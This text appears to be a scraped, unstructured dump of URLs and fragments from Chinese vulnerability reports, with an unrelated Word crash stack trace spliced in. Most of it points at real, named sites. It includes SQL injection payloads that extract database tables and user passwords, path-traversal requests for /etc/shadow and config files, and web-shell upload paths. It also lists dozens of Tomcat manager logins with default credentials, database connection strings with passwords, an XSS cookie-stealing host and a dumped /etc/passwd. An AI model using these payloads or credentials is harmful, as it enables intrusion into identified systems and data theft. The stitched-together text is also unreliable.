http://www.wuai.lwedu.sh.cn/ws2004/ http://www.wuai.lwedu.sh.cn/ws2004/SysManag http://www.yzsx.net.cn/ws2004/ http://www.yzsx.net.cn/ws2004/SysManage/Lea http://www.cgyz.net.cn//ws2004/ http://www.cgyz.net.cn//ws2004/SysManage/Le http://www.lypcc.com.cn/artcontent.php?id=20141214767 http://61.189.86.11/xw.asp;xw.jpg http://www.hutz.org.cn/ http://www.hutz.org.cn/data/mysql_error_trace.inc http://www.hutz.org.cn/tongzhan/ http://mss-oa.taikanglife.com/Images http://www.sunwayinfo.com.cn/ http://gpd.scstl.org/ http://sso2.dglib.cn/ http://202.120.96.47/ http://gpd.nbsti.net/ http://202.38.93.37/ http://220.178.98.37:8084/ http://202.106.33.180/ http://202.106.33.180/20142609112654.asp;.txt www.kantv.tv www.7po.com/config/config_global.php~ http://erp.titita.com//UC/User/logon?psw=1&user= http://xbxerp.snow-bear.cn//UC/User/logon?psw=1&user= http://baby.erp2.meetok.com//UC/User/logon?psw=1&user= http://meetok.com/cases.aspx,影响也不小。 https://www.travelzen.com,不知道是不是重要系统呢?貌似是国外主站 www.travelzen.com/aboutus.php www.travelzen.com/contactus.php www.travelzen.com/doChangeCurr.php www.travelzen.com/doMemberAccountProfile.php www.travelzen.com/doMemberForgotPassword.php www.travelzen.com/doMemberLogin.php www.travelzen.com/doMemberPromotion.php www.travelzen.com/doMemberRemoveTraveler.php www.travelzen.com/doMemberSignup1.php www.travelzen.com/doThirdPartyLogin.php www.travelzen.com/faq.php www.travelzen.com/include/security_img_Mem.php www.travelzen.com/mediaCenterNews.php www.travelzen.com/memberMyAccount.php www.travelzen.com/memberSignupLogin.php www.travelzen.com/orderList.php http://weirenwu.weibo.com/taskv2/index.php?c=order.orderManage&method=new&sTime=2014-12-30+00%3A00%3A00&eTime=2015-01-04+00%3A00&taskName=123&paytype= http://weirenwu.weibo.com/taskv2/index.php?c=order.orderManage&method=new&sTime=2014-12-30+00%3A00%3A00&eTime=2015-01-04+00%3A00&taskName=123'&paytype= http://weirenwu.weibo.com/taskv2/index.php?c=order.orderManage&method=new&sTime=2014-12-30+00%3A00%3A00&eTime=2015-01-04+00%3A00&taskName=123''&paytype= http://i.178.com/~album.photo.view_thread/id/2737202/uid/105652 url:http://202.108.90.135/gsApp/login.action http://www.2977.com/card/jtz_card.aspx?gameCode=ly http://www.sqlmap.org www.2977.c http://www.yichemall.com/User/ForgotPassword http://www.yichemall.com/user/checkmobile?telephone=1xxxxxxxxxx http://www.yichemall.com/user/_ChangePwdByPhone http://web.youxipai.com/games/content/ http://o2o.fanwe.net/biz.php?ctl=login http://deals.travelzen.com与http://events.travelzen.com/存在相同的问题 http://deals.travelzen.com/include/config.inc http://deals.travelzen.com/include/en/config.inc http://deals.travelzen.com/php/includes/config.inc http://deals.travelzen.com/php/includes/en/config.inc http://deals.travelzen.com/templates/en/config/config.inc http://deals.travelzen.com/templates/sc/config/config.inc http://deals.travelzen.com/templates/tc/config/config.inc http://mail.payeco.com http://mail.payeco.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 inurl:ws2004 http://www.xxoo.com/ws2004/SysManage/ http://www.suyaxing.com:81/ws2004/SysManage/UserManage/SysManage/editxml.asp?ID=1 http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1 http://mail.xdrcb.com/ http://b.weimai.com/index.php/wap/Index/order/token/1252359/c_userid/0/skuid/244285/buy_count/1/from/view?id=33094 http://pay.2977.com/Pay/LyPay?gameid=wycq http://www.sqlmap.org http://121.15.14.228:81/wfvideo/login.action http://eelab.sjtu.edu.cn/EELAB/EELAB.rar http://jifen.imop.com/include/.svn/entries http://jifen.imop.com/test.php http://jifen.imop.com/include/.svn/text-base/conf_mysql.php.svn-base http://jifen.imop.com/include/.svn/text-base/cls_mysql.php.svn-base http://jgjc.shdrc.gov.cn/gzcx/listFbXX.do www.shuobozhaopin.com/Person/Per_Search_Advance.asp gaobu.dgjob.cn/Person/Per_Search_Advance.asp www.smrc.com/Person/Per_Search_Advance.asp www.jobjp.cn/Person/Per_Search_Advance.asp www.0566job.com/Person/Per_Search_Advance.asp www.lsrc114.com/Person/Per_Search_Advance.asp www.fhclm.com/Person/Per_Search_Advance.asp http://yanjiusheng.bistu.edu.cn/web/InfoKindList.aspx?kind=0201 http://yanjiusheng.bistu.edu.cn/web/infoList6.aspx?kind=02 http://yanjiusheng.bistu.edu.cn/web/ViewSearch.aspx?word= http://yanjiusheng.bistu.edu.cn/web/ViewKindInfo.aspx?kind=02 http://dbcourse.bistu.edu.cn/searchList.aspx?name= http://shop.6eat.com/group_buy.php?id=9 http://service.chinaums.com/uis/uisWebLogin/login http://ky.52ku.com http://ky.dg.52ku.com http://ky.zs.52ku.com http://cz.52ku.com http://www.lfjxt.cn/admin/login.aspx http://www.gdgyagri.gov.cn/zjxx.asp?id=13 http://goods.tudou.com/seller/ https://github.com/suncry/517na/tree/79544032a1bf2fff321f9f56b6f60d61798bc647 https://github.com/suncry/517na/tree/79544032a1bf2fff321f9f56b6f60d61798bc647/na517 http://203.195.196.198:81/ http://www.qyszxxz.com/sub.jsp?classid=18 http://www.sasacgs.gov.cn/sub.jsp?classid=188 http://www.gszlyy.com/sub.jsp?classid=336 http://www.ldlyy.com/sub.jsp?classid=26&preid=18 http://www.gsjkjy.org.cn/sub.jsp?classid=9 http://www.qyszxxz.com/sub_detail.jsp?classid=17 http://www.ldlyy.com/sub_detail.jsp?classid=35&preid=1&contentid=598 http://www.ldlyy.com/sub.jsp?classid=26&preid=1 http://www.gsjkjy.org.cn/detail.jsp?articleId=8980 http://202.100.85.100/detail.jsp?articleId=519 http://www.sasacgs.gov.cn/detail.jsp?articleId=759 http://www.ldlyy.com/detail.jsp?articleId=574 http://www.qyszxxz.com/detail.jsp?articleId=154 http://gsblood.com/detail.jsp?articleId=385 http://qyfybj.com/detail.jsp?articleId=299 http://www.gsjkjy.org.cn/detail.jsp?articleId=8980 http://www.qyszxxz.com/list.jsp?classid=19 http://www.ldlyy.com/list.jsp?classid=10 http://www.gsjkjy.org.cn/list.jsp?classid=49 http://61.178.83.34/list.jsp?classid=752 http://www.jcsxz.com/list.jsp?classid=22 http://www.qyszxxz.com/list.jsp?classid=24 http://www.sasacgs.gov.cn/leader.jsp?classid=206 http://www.ldlyy.com/leader.jsp?classid=35&preid=1 http://www.jygsyy.com/leader.jsp?classid=26 http://www.gszlyy.com/leader.jsp?classid=320&preid=318 http://202.100.85.100/detail.jsp?articleId=519 http://hhyjzx.ahu.edu.cn/ http://211.137.18.174/20155407125426.asp;.txt http://bbs.gome.com.cn/plugin.php?action=index&id=nds_up_ques http://www.czkjllt.com/FCKeditor/editor/fckeditor.html http://www.czkjllt.com/ban.asp http://caigou.xinyuan.com.cn/xmal/index.jhtml http://**.**.**/beta http://v.youku.com/v_show/id_XMzc5NzQyNzQw.html http://**.**.**/management/ http://**.**.**/eid/home.action http://**.**.**/eid/start.action http://wap.zslib.com.cn/library/library!toBookDetail.action?docNumber=2162108&lib=ZSL01 http://crm.itrus.com.cn/ http://wooyun.org/bugs/wooyun-2015-090368部分重复 http://crm.itrus.com.cn/pub/bgtaskreq.php?svr=1 http://crm.itrus.com.cn/background/onlinemeetingstatus.php?ID=1 http://crm.itrus.com.cn/background/sendsms.php?ID=1 http://crm.itrus.com.cn/background/smsstatusreport.php?ID=1 http://xss.re/7188 http://xss.re/api-7187.jpg,命名为目标,和一个接受cookie项目,见下图 http://jysd.shou.edu.cn/ http://jyw.jhc.cn/ http://job.wzu.edu.cn/ http://sju.91job.gov.cn/ http://job.zust.edu.cn/ http://jy.cczu.edu.cn/ http://ledp.dongfeng-citroen.com.cn/Index/login http://202.103.37.45 STACK_FRAME:Unknown STACK_FRAME:mmcndmgr!ATL::CComContainedObject STACK_FRAME:ole32!OleIsRunning+0x25 STACK_FRAME:wwlib!wdCommandDispatch+0x1a74f5 STACK_FRAME:wwlib!DllCanUnloadNow+0x2af90a STACK_FRAME:wwlib!FMain+0x3bf53 STACK_FRAME:wwlib!FMain+0x311ad STACK_FRAME:wwlib!FMain+0x7d849 STACK_FRAME:wwlib!DllGetLCID+0x364f4 STACK_FRAME:wwlib!wdCommandDispatch+0x8332a STACK_FRAME:wwlib!DllCanUnloadNow+0x363d18 STACK_FRAME:wwlib!DllGetLCID+0x3c759 STACK_FRAME:wwlib!DllGetLCID+0x33c3c STACK_FRAME:wwlib!DllGetLCID+0x3125b STACK_FRAME:wwlib!wdCommandDispatch+0xfb030 STACK_FRAME:wwlib!wdCommandDispatch+0x2ddb82 STACK_FRAME:wwlib!FMain+0xd2029 STACK_FRAME:wwlib!FMain+0xe8b16 STACK_FRAME:wwlib!FMain+0xe8449 STACK_FRAME:wwlib!FMain+0xe8383 STACK_FRAME:wwlib!FMain+0xe7eeb STACK_FRAME:wwlib!FMain+0xe7de9 STACK_FRAME:wwlib!DllGetClassObject+0x6f122 STACK_FRAME:wwlib!FMain+0xe6125 STACK_FRAME:wwlib!FMain+0xe5ddb STACK_FRAME:wwlib!FMain+0xe5cd3 STACK_FRAME:VBE6!lblEX_ThisVCallHresult+0x22 STACK_FRAME:OLEAUT32!DispCallFunc+0x16a STACK_FRAME:VBE6!EpiInvokeMethod+0x2e3 STACK_FRAME:Unknown STACK_FRAME:VBE6!BASIC_DISPINTERFACE_Invoke+0x91 STACK_FRAME:VBE6!WRAPPER_EVENT_SINK::Invoke+0x8e STACK_FRAME:wwlib!FMain+0x1012a8 STACK_FRAME:wwlib!FMain+0x1011b3 STACK_FRAME:wwlib!FMain+0x101467 STACK_FRAME:wwlib!FMain+0x1013dd STACK_FRAME:wwlib!FMain+0x100ff8 STACK_FRAME:wwlib!FMain+0x10137b STACK_FRAME:wwlib!FMain+0x7c74f STACK_FRAME:wwlib!FMain+0x7c6b1 STACK_FRAME:wwlib!FMain+0x530e2 STACK_FRAME:wwlib!DllGetLCID+0x185b2 STACK_FRAME:wwlib!DllGetLCID+0x10863 STACK_FRAME:wwlib!DllGetLCID+0x10494 STACK_FRAME:wwlib!DllGetLCID+0x10101 STACK_FRAME:wwlib!DllGetLCID+0xffac STACK_FRAME:wwlib!DllGetLCID+0xfe30 STACK_FRAME:wwlib!FMain+0xd2029 STACK_FRAME:wwlib!wdCommandDispatch+0x3f798b STACK_FRAME:wwlib!wdCommandDispatch+0x3f7f06 STACK_FRAME:wwlib!DllCanUnloadNow+0x3ba5b2 STACK_FRAME:wwlib!DllCanUnloadNow+0x3ba9e4 STACK_FRAME:wwlib!FMain+0xd4b3f STACK_FRAME:wwlib!FMain+0xdf6fb STACK_FRAME:wwlib!FMain+0xdc6b3 STACK_FRAME:wwlib!FMain+0x6ac STACK_FRAME:WINWORD+0x15fb STACK_FRAME:WINWORD+0x156d STACK_FRAME:kernel32!BaseProcessStart+0x23 INSTRUCTION_ADDRESS:0x0000000010110d5f DESCRIPTION:Possible SHORT_DESCRIPTION:PossibleStackCorruption CLASSIFICATION:UNKNOWN http://youkubj-pms.youku.com/trial/?qq-pf-to=pcqq.c2c http://www.jtf.org.tw:80/psyche/news.asp?This=1754(疑似可跨多数据库) http://118.123.244.238/login.action http://203.195.203.213:8080/admin http://inbbs.17u.com:8080 com:8080 http://fax.sfn.cn/fax.rar http://active.zqgame.com/zqgame/zbx/cutegirl/admin/admin.aspx url:http://222.223.218.138:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.116:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.118:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.115:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.114:8000/manager/html user:tomcat pass:tomcat url:http://117.78.2.208:8000/manager/html user:tomcat pass:tomcat url:http://221.7.205.53:8000/manager/html user:tomcat pass:tomcat url:http://221.7.205.54:8000/manager/html user:tomcat pass:tomcat url:http://210.14.154.142:8000/manager/html user:tomcat pass:tomcat url:http://123.151.19.108:8000/manager/html user:tomcat pass:tomcat url:http://121.29.227.53:8000/manager/html user:tomcat pass:tomcat url:http://120.0.221.6:8000/manager/html user:tomcat pass:tomcat url:http://119.113.142.86:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.116:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.115:8000/manager/html user:tomcat pass:tomcat url:http://60.8.196.166:8000/manager/html user:tomcat pass:tomcat url:http://222.223.218.94:8000/manager/html user:tomcat pass:tomcat url:http://222.222.23.140:8000/manager/html user:tomcat pass:tomcat url:http://222.94.89.241:8000/manager/html user:tomcat pass:tomcat url:http://222.68.180.154:8000/manager/html user:tomcat pass:tomcat url:http://221.226.100.162:8000/manager/html user:tomcat pass:tomcat url:http://219.148.122.196:8000/manager/html user:tomcat pass:tomcat url:http://219.148.122.239:8000/manager/html user:tomcat pass:tomcat url:http://218.249.195.243:8000/manager/html user:tomcat pass:tomcat url:http://219.129.201.124:8000/manager/html user:tomcat pass:tomcat url:http://218.90.137.138:8000/manager/html user:tomcat pass:tomcat url:http://218.94.67.218:8000/manager/html user:tomcat pass:tomcat url:http://218.71.138.206:8000/manager/html user:tomcat pass:tomcat url:http://202.103.207.38:8000/manager/html user:tomcat pass:tomcat url:http://202.103.207.39:8000/manager/html user:tomcat pass:tomcat url:http://122.224.101.76:8000/manager/html user:tomcat pass:tomcat url:http://119.129.151.64:8000/manager/html user:tomcat pass:tomcat url:http://119.127.193.159:8000/manager/html user:tomcat pass:tomcat url:http://116.247.125.130:8000/manager/html user:tomcat pass:tomcat url:http://116.231.4.61:8000/manager/html user:tomcat pass:tomcat url:http://61.185.212.85:8000/manager/html user:tomcat pass:tomcat url:http://61.130.101.106:8000/manager/html user:tomcat pass:tomcat url:http://60.190.30.214:8000/manager/html user:tomcat pass:tomcat url:http://58.49.94.100:8000/manager/html user:tomcat pass:tomcat url:http://121.40.31.44:8080/manager/html user:tomcat pass:tomcat url:http://121.201.5.29:8080/manager/html user:tomcat pass:tomcat url:http://121.201.13.113:8080/manager/html user:tomcat pass:tomcat http://60.28.196.17/resin-admin/status.php http://60.28.196.61/resin-admin/status.php http://60.28.196.62/resin-admin/status.php http://60.28.196.141/resin-admin/status.php http://123.125.98.202:47078/essframe http://115.182.12.9/security/login.hlt http://mgbz.szlib.com:8080/PAPER/GetNews.action http://mgbz.szlib.com:8080/PAPER/demo.jsp http://58.213.19.68/users/sign_in http://58.213.19.68/users/sign_up http://m.rayli.com.cn/article/search.php?ver=iphone&tag=AYUKI http://**.**.**/ http://www.izhenxin.com/ http://ewp.suning.com.cn url:http://xxcg.ciwong.com/learninglevel/SubjectDet http://rmp.haier.net/index.php?g=Home&m=Index&a=index http://verisign.itrus.com.cn http://verisign.itrus.com.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags%29%20or%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,table_name,0x27,0x7e%29%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://enterprise.zte.com.cn/servlet/DownLoadFenJieServlet?fileName=/app/loadToSupport/loadToSupport.jsp&newFile=1&outFileName=1.txt http://222.247.51.155:9000/webpage!indexPage.action http://222.247.51.155:9000/LoginAction.do http://www.mdjkjj.gov.cn:8080/wfvideo/authorityAction.action http://59.57.3.150/user/check.asp?pwd=&uID= http://xxxxxxxx/ucenter/login/loginAction!login.action admin:admin http://www.bankpos.com.cn/admin/images/ http://www.bankpos.com.cn/admin/upfile.asp http://112.94.161.30/busiqry/user-card-balance!balanceQry.action http://58.213.19.231:8080/ucenter/index.jsp http://58.213.19.231:8080/ucenter/forget/forgetAction!forget.action http://113.108.219.40/Approve/Module/Share/Notices.aspx?sys=APPROVESYS&nid=181&code= http://www.szxc.net.cn/ site:szxc.net.cn http://www.szyz.gov.cn/DownLoad.aspx?url=upload/File/2014/e98e5da0-9f15-479b-9d62-60e9c149547d.pdf&fname=%E5%86%85%E6%B2%B3%E8%88%B9%E5%9E%8B%E6%A0%87%E5%87%86%E5%8C%96%E5%B7%A5%E4%BD%9C%E8%B5%84%E9%87%91%E7%AE%A1%E7%90%86%E5%8A%9E%E6%B3%95.pdf http://www.nongyou.com.cn/ http://218.56.40.229:8026/SysManage/CunMapShow.aspx?qid= http://60.217.72.17:6001/SysManage/CunMapShow.aspx?qid= http://123.133.64.59:6001/SysManage/CunMapShow.aspx?qid= http://221.2.171.59:8100/SysManage/CunMapShow.aspx?qid= http://221.2.149.47:8300/SysManage/CunMapShow.aspx?qid= https://member.meizu.com/sso?appuri=http%3A%2F%2Fbbs.meizu.cn%2Flogging.php&useruri=http%3A%2F%2Fbbs.meizu.cn%2F&sid=&service=bbs&autodirct=true https://member.meizu.com/sso/login http://bbs.meizu.cn/logging.php?token=特别长的token或者http://bbs.flyme.cn/login.php?token=特别长的token www.baidu.com?bbs.meizu.cn%2Flogging.php处,拿着这个token请求logging.php或login.php就OK了 https://member.meizu.com/sso?appuri=http%3A%2F%2Fmysite.com?bbs.meizu.cn%2Flogging.php&useruri=http%3A%2F%2Fbbs.meizu.cn%2F&sid=&service=bbs&autodirct=true http://www.nongyou.com.cn/ http://218.56.40.229:8025/ckq/cwgkview.aspx?CountryName=%e8%a5%bf%e5%8c%97%e5%85%b3 http://61.133.119.187:8091/ckq/cwgkview.aspx?CountryName=%E5%9B%9B%E7%94%B2%E6%9D%91 http://222.135.127.190:7200/ckq/cwgkview.aspx?CountryName=%E5%8D%97%E9%BB%84%E6%9D%91 http://123.134.189.60:8007/ckq/cwgkview.aspx?CountryName=%E5%B0%8F%E5%BA%99%E6%9D%91 http://111.17.169.213:801/ckq/cwgkview.aspx?&CountryName=%E4%B8%89%E6%B3%89%E6%9D%91 http://p1.wdzx.com/wdrzmgview?search=%E4%B8%AD%E8%B4%B7%E4%BF%A1%E5%88%9B http://99rcw.cn/www.zip http://jiwei.sjtu.edu.cn/web.rar http://www.17u.com/special/2010wujiang/blog-show.asp?id=6337 http://wed.27.cn/marry/marryadmin admin:ailiadmin,成功登陆后台 https://github.com/davidaq/hdzx/blob/master/Common/SendMail.php http://180.153.24.6:8180/ https://sfadp.sf-express.com https://219.134.187.215 http://gc.imop.com/passport/login.php http://roundcube.net/,下载最新版本。 http://q.115.com/ http://ting.weibo.com/music/show/showlist?location=35&duration=false&getticket=false&viewtype=time&page=1 http://weirenwu.weibo.com/taskv2/index.php?c=cpcs.createOrder&tid=726407 http://ganglia.ihep.ac.cn/gweb/ http://plus.youxipai.com/search.php?keyword=%E4%B8%89%E5%9B%BD&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=1,69,83&TotalResult=35&filesize=&PageNo=-2 http://bbs.dedecms.com http://www.jgrcb.com/bankcardlists.php?cid=21 http://www.jgrcb.com/?cid=&page= http://www.jgrcb.com/bankcardcons.php?cid=23&id=38 http://www.jgrcb.com/webadmin/Tzstudent_Com.php http://www.jgrcb.com//upload/1377418921.php http://www.jgrcb.com/a.php http://www.jgrcb.com//upload/sb.php http://123.126.98.120:82/ http://bd-bank.com.cn/download/download.jsp?filepath=../../WEB-INF/WEB.XML http://bd-bank.com.cn/download/download.jsp?filepath=download/download.jsp http://www.oa.jinedu.cn/newjyoa/ admin:admin admin:123456 http://www.dlrcb.cn/NewsWebUI/NewSearchMapFrame.aspx?searchText= http://www.sqlmap.org www.dlrcb http://www.jsdtrcb.com/newsClass.asp?class_id=1 http://www.sqlmap.org www.jsdtrc http://www.jsdtrcb.com:80/err.asp http://www.jb51.net/do/tag.php?/%CA%A7%C1%E9/-1272%E2%80%9D/ http://210.73.83.146/lzjPrj/home/NewsList.aspx?id=5 http://www.sqlmap.org http://job.admin5.com/Company/Com_Search.aspx?redate=180&cvalid=&flag=1&city=6100 http://job.admin5.com/Company/Com_Search.aspx?redate=180&cvalid=1400&searchkey=&flag=1&city=6302 http://zhaopin.deppon.com url:http://www.go100.cn/Filesys/admin.php?m=Public&a=login http://democn.b2b-builder.com/main.php?m=tg&s=admin_orderadder http://61.150.72.184:8080/ http://61.150.72.184:8080/20143123013126.asp;.txt http://**.**.**/querysystemstatus.asp https://183.62.56.125/welcome.php http://www.unicomlabs.com/联通此站存在设计缺陷 http://www.unicomlabs.com/ http://www.unicomlabs.com http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58 http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58 http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58嵌入到钓鱼页面中发给对方 http://xsweb.uvu.edu.cn/ http://zhidao.baidu.com/link?url=Yjp5QaLrzSDK9GQUuKROAtvvNH9iRGbqIJ8I7xsfAX0hfyrilWCR2WXsX14deKXmT_iHQggLbBzszA_EeYd9Kq http://jw.ynjtc.com/xsweb http://219.228.48.108:81/xsweb/ http://121.8.99.242/xsweb http://xsweb.uvu.edu.cn/default.aspx http://xsweb.uvu.edu.cn/TZJK/ViewHabitusHealthStandard.aspx http://www.ndfcrcw.com/data.rar http://www.ot-hs.com/index1.asp http://xss.re/7188 http://xss.re/7188 http://122.225.26.86:7001/wscx_jx/ http://122.225.26.86:7001/console/ http://bwc.buaa.edu.cn/download.action?filePath=../../../../../../etc/shadow CT3TSokCDGcBTOeklEJGM1:16311:0:99999:7 http://cloud.suning.com http://cloud.suning.com/cloud-web/share/link.htm?sk=aaaeJi http://news.njr.so:8002/uc/uc/login/login2.action http://schoolhouse.eduapp.ahedu.gov.cn/地址 https://github.com/lijiejie/edu-dns-zone-transfer/tree/master/DNS https://sfadp.sf-express.com/status?full=true https://sfadp.sf-express.com/jbpm-console https://sfadp2.sf-express.com/admin-console,典型的哪里有问题补丁哪里。 http://cy.smehlj.gov.cn/ps/ jdbc:oracle:thin:@172.172.172.112:1521:ORCL IP:113.5.194.0 http://www.wooyun.org/feedback.php?bugid=90666 http://www.enet.com.cn/itself/ http://tg.gw.com.cn/admin/ http://114.80.158.17/admin/searchMessage.php?page=22 http://114.80.158.17/admin/votelog.php http://219.232.209.140:8080/WebCall/notice_view.action http://219.232.209.140:8080/WebCall http://219.232.209.140:8080/WebCallBusiness/ http://zuopin.4399.com/center.php?ac=down&f=http://plimg2.5054399.com/20s15_01_07_e9eb267s600ec977f9662d95dc5d8a000.jpg http://plimg2.5054399.com/开头 http://zuopin.4399.com/center.php?ac=down&f=http://plimg2.5054399.com@160.16.x.x/4399 http://www.yixiangzhan.com/login.asp http://space.vogue.com.cn/home.php?mod=space&do=friend http://svip.sto.cn http://www.dapu.com/zx/wp-login.php http://travel.e-picclife.com/ http://mylive.moyuntv.com/html/wap/userMsg.html www.highpin.cn http://c.highpin.cn/Message/MessageDetail/13371 http://c.highpin.cn/Message/MessageDetail/09227 http://www.nongyou.com.cn/ http://218.56.40.229:8025/ckq/hnzcout.aspx?CountryName=%E8%A5%BF%E5%8C%97%E5%85%B3 http://222.134.154.214:8001/ckq/hnzcout.aspx?CountryName=%E5%A7%9A%E5%AE%85 http://111.17.169.213:801/ckq/hnzcout.aspx?CountryName=%E8%8E%B2%E6%B1%A0 http://jwh.tanljgzx.gov.cn/ckq/hnzcout.aspx?CountryName=%E8%A5%BF%E5%8F%A4%E5%9F%8E http://218.58.124.131:8003/ckq/hnzcout.aspx?&CountryName=%E5%AD%99%E5%BA%84%E6%9D%91 http://www.sdmgyfc.com/product/html/9.html www.sdmgyfc.com http://**.**.**/dylgy/default.aspx http://114.80.136.43/test.php?x_pwned=cmd http://images.51cto.com/images/pixviewer.swf http://www.yesky.com/TLimages/yeskyimages/pixviewer.swf http://www.bhcbd.gov.cn/WebPages/pixviewer.swf http://house.focus.cn/image/pixviewer.swf http://www.xedz.gov.cn/lib/Player/pixviewer.swf http://www.hebinhe.net/new/flash/pixviewer.swf http://qxxnw.qingdao.gov.cn/images/focus.swf http://youxi.baomihua.com:9000/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://youxi.baomihua.com:9000/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://ceshi.51ping.com/getUserInfo?usernickname=iamp912&mobileno=xxxxx bbs.51ping.com/bbs root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin nagios:x:498:500:nagios:/var/log/nagios:/bin/sh mysql:x:497:501::/home/mysql:/bin/bash zabbix:x:496:497:Zabbix System:/var/lib/zabbix:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin https://yonghu.ecton.com.cn http://124.238.218.227:89/m1/login.do jdbc:jtds:sqlserver://127.0.0.1:1433;DatabaseName=ecology7;user=sa;password=wEAver2012 jdbc:oracle:thin:ecologydev/ecology@192.168.0.204:1521:weaver1 http://114.80.136.192:28017/ http://flash.sznews.com:8585/cms/web/xztv/bbsLogin/test.jsp http://60.10.8.227:89/m1/login.do jdbc:jtds:sqlserver://192.168.0.204:1433;DatabaseName=ecologydev;user=sa;password=ecology jdbc:oracle:thin:ecologydev/ecology@192.168.0.204:1521:weaver1 jdbc:jtds:sqlserver://127.0.0.1:1433;DatabaseName=ecology7;user=sa;password=wEAver2012 http://**.**.**/ http://democn.shop-builder.cn/product-list-100601.html http://221.176.9.201/login.do http://202.119.108.32/ inurl:sydwzk/policy http://www.smrsks.com/ http://www.smrsks.com/syrcservlet?RequestType=NEW&RightCode=Guest&flag=add&userNo=wooyun&step=1 http://www.smrsks.com/syrcservlet?RequestType=NEW&RightCode=Guest&flag=checkcount http://218.75.114.22:80/ http://218.75.114.22/20143123013126.asp;.txt http://www.ahlyrc.com/ahlyrc.rar http://60.2.213.82:80/ http://60.2.213.82/20143124113103.asp;.txt http://124.193.81.210:8080/ http://116.52.250.236:80/ 